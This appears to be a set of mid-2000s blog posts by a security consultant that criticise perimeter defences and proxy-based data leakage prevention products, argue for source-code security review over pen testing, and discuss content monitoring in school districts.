Israeli Software

Take for example, the Veterans Administration event in May 2006. Data containing unencrypted names, Social Security numbers and birth dates of all U.S. veterans discharged since 1975 was stolen during a burglary at the Maryland home of a data analyst who works for the agency.

Lots of IT security consultants will tell you that the No. 1 tool to protect data is awareness, yet VA officials said the analyst wasn't authorized to take it home. So, the employee was probably aware but made a mistake.

I read a quote from Robert Garigue, chief security executive and vice president of information integrity at Bell Canada in Montreal: "What it comes down to is information life-cycle anagement".

That's a very nice statement, but I sure as heck don't understand what that means and I doubt my customers do either. All MY customers are still busy with firewall, anti-virus and anti-spyware - a situation echoed by a colleague of ours over at Nextel,the number 2 security integrator in Spain.

Managing information is an operational risk, but are firewalls, anti-virus and anti-spyware relevant to operational risk?

Security technology is seen as a means of defending the organization rather than as a means of improving understanding and reduction of operational risk.

Today’s defense in depth strategy is to deploy multiple tools at the network perimeter such as firewalls, intrusion prevention and malicious content filtering and at endpoints; removable device control and personal firewalls. The defense-focus is on outside-in attacks, despite the fact that the majority of attacks on customer data and intellectual property are inside out.

For sure, information life-cycle management products can help control access, and regulate flows of sensitive data in order to prevent unauthorized disclosure. However, the process of classifying and monitoring enterprise information is highly complex and expensive, and as
a result has not seen wide customer adoption.

If you're a CIO or CISO, I recommend the following practical strategy:
(which will be a lot cheaper than paying a vendor $5-10M for an enterprise information life-cycle management system)

1. Understand that information security is a major operational risk for your company. You'll find that the CEO appreciates that approach a lot more than your usual spiel about IT security defense-in-depth.

2. Get some software to encrypt data on notebook hard disks - there is lot of
free encryption Tools

3. Give managers corporate USB drives, get the kind that come with encryption. Tell them that use of personal USB drives will be paid for in their performance review.

4. Write an AUP regarding data encryption on notebooks and USB drives. Make everyone sign and make violations and compliance part of the employee's performance review.
Download a free Internet AUP here

5. Realize that 50% of all security breaches are due to exploitable vulnerabilities in enterprise software; in particular Web applications - the bugs are simple, fundamental defects. Call us and we'll help you reduce your operational risk due to buggy software.

Well - I'm back from my Sukkot vacation and I see that the raw material for the blog is just piling up - so where do we start? Let's start by bashing Web and mail proxies.

The temptation to use an application layer proxy for filtering outgoing content is just too great.

You don't have to worry about sniffing traffic, reconstructing sessions and you can always build your content monitoring and filtering application on an existing proxy server (like Microsoft ISA server) or use ICAP to take a stream from someone else.

I've recently been looking closer at commercial CMF/Internet Leakage Prevention/Extrusion Prevention products like Port Authoriy Technologies that use Web and mail proxies. The results are not encouraging and should be a warning light to potential customers to temper the hype from investors and product-manager/marketing types.

Any proxy-based system, will have three major shortcomings when compared with a Layer 2 content interception systems:

1. If you use forward proxies for mail and HTTP, then by design, your product cannot monitor non-proxied traffic – which characteristically is 20-30% of all outgoing network traffic. The customer doesn’t know what data is actually leaking since a proxy lacks visibility. Based on live operations at some of my customers, a typical implementation starts with a list of 10-20 IP addresses that are authorized to bypass the mail and Web proxy servers; however, within 48 hours of operation, the number blossoms by a factor of 10x or more..

2. A forward proxy only monitors outgoing traffic – in other words if a user extrudes sensitive data using an HTTP GET (by placing the sensitive data in the query string); the proxy is incapable of identifying the event and cannot mitigate the threat. Think about using AJAX and a Web Proxy for Cross-Domain XMLHttpRequest Calls; the browser GET's a page, then does a XMLHttpRequest to the server, the server then forwards your data anywhere it likes - making the fancy 6 figure Internet Leakage Prevention appliance totally worthless since it doesn't process GET requests, only POSTs.

3. Transparent proxies like Port Authority or Blue Coat require that all traffic is authenticated Microsoft Windows network users. This means that it cannot monitor Linux / Unix/ AS400 networks and cannot monitor rogue users on the network such as custom spyware.

I suppose - you might say - they don't "GET" it....

I was talking to a prospective customer recently about what I do - i.e. help companies
reduce their operational risk by removing fundamental security defects from software. He said to me - "Oh, you mean that's like application security right?". My initial response was that we tend to work more with software development as opposed to vendor-supplied compiled applications and we sort of left it at that.

My answer bothered me in the back of mind for about three weeks until I realized why.

Most IT security staffers/CISO's are people that came into the job with an IT operations or network infrastructure background. They generally have a very basic knowledge of software development and few were professional software developers in a language like C, Cobol, C# or Java in a previous lifetime. They are charged with protecting the network and servers, and by and large all of their work is reactive.

The entire IT security industry, led by companies such as Checkpoint, Symantec and McAfee delivers reactive products built on this operations perspective. The common denominator of every IT security product like firewalls, IDS, IPS and application security firewalls is that they are reactive; which is why companies continue to spend money on information security
and security breaches continue to rise.

NONE of these products address the root cause of the problem, which is buggy, insecure software.

Ask a software developer if a product that does black-box testing based on a checklist of exploits can really determine all the security holes. She will laugh at you. An application security testing tool or application firewall cannot properly mitigate the threat of malicious hackers who have taken the time to learn the vagaries of the source code.

Ask yourself if your firewall, which allows outgoing HTTP on port 80 can prevent data theft.
The firewall is based on a notion of protecting trusted systems and users inside a hard
perimeter. However, the notion of trusted systems inside a hard perimeter has practically vanished with the proliferation of Web services, SSL VPN and convergence of application transport to HTTP.

True, there are new, (rather expensive) content monitoring/data leakage prevention/Internet leakage prevention/extrusion prevention technologies. But - should your organization spend 6 figures on an extrusion prevention solution while ignoring software vulnerabilties, knowing that 50-80% of all data security breaches are due to fundamental software security defects?

For once, I agree with Gartner Research:

"Through 2010, software development organizations that integrate security into their software development life cycles will experience an 80 percent decrease in critical vulnerabilities found in their publicly released software or externally facing Web applications (0.8 probability)".

Black-box application security testing is good for setting a minimum requirement for commercial, compiled ISV applications. Black-box testing is quick, it's efficient in terms
of human resources and its also an important support tool to expert-based evaluation of the source code vulnerabilities. It cannot replace getting your hands dirty.

Every security consultant I run into talks about pen (penetration) testing they do for clients. I have not met a single consulting firm that talks about opening up the production software code and looking for vulnerabilities. The reason is that it is just too damn easy to do a pen test, the customer gets a report, and the consultant gets paid and everybody sleeps well at night.

Let me relate a story. A few years ago, at a previous place of employment (Commerce.net) we provided secure transaction processing services to online merchants. We contracted with one of the top networking consultants to do a pen test - which he did - remotely from his office - and he gave us a report of open ports and services. We asked some questions and after getting some standard answers (I suppose they are standard) we proceded to close down the exposed ports and services.

Our friend the consultant never bothered coming around to the office during the pen test. What about social engineering? What about vulnerability in the source code of the scripts we wrote and ran for secure credit card processing?

About 3 months later, our VP operations got a phone call from a white-hat hacker who had the names and job titles and organizational structure of the entire company. They met for lunch and it turned out that our white-hatted friend had exploited a vulnerability in Windows servers that could never be detected in a remotely executed pen test. I wont go into details in the interest of protecting both parties.

There is a lot of talk about awareness and governance and compliance stuff which I dont understand, but what I do know is that you cannot pen-test security into your systems just the way you cannot test quality into your software.

It appears that K-12 has become an interesting niche for advanced content monitoring and filtering products, although my knee-jerk reaction is that a junior high is the last place I would expect to see a cutting-edge solution for controlling disclosure of sensitive data.

Back when I was in junior high and had a crush on Randi Gottlieb, our version of SMS was sending folded pieces of paper across the room, propelled by a rubber band.

On second thought, perhaps extrusion prevention in schools today is not so surprising after all, considering intensive use of text and instant messaging.

Instant Messaging usage by children under 18 is growing rapidly and has surpassed email usage. I bet that within 10 years, email will become a tool for the over-50 crowd with under 30's communicating primarily using IM and SMS. Instant Messaging provides instant gratification for a lot of things: talking to your girl friend, text payments for MP3 or walking on the dark-side and connecting with a drug dealer outside the school.

Vericept and St. Bernard have tackled the education/library market with school-level hardware appliances.Fidelis has taken a somewhat different tack by providing content monitoring for an entire school district using it's gigabit network security extrusion prevention appliance at the network gateway layer.

The Washington DC public school district was Fidelis's first customer and last week Fidelis announced that Orange County Public Schools in Florida (one of the top 15 school systems in the United States) selected Fidelis XPS to protect personally identifiable information (PII) of students and enforce the school district’s Acceptable Use Policies (AUP).

OCPS plans to use the Fidelis XPS system to identify violations and vulnerabilities and escalate them into a discussion about how to change their control policy.

Based on my experience with my commercial clients (like 013 Barak in Israel) - I am sure that OCPS will be kept real busy with large numbers of violations that will definitely influence their control policy for the network.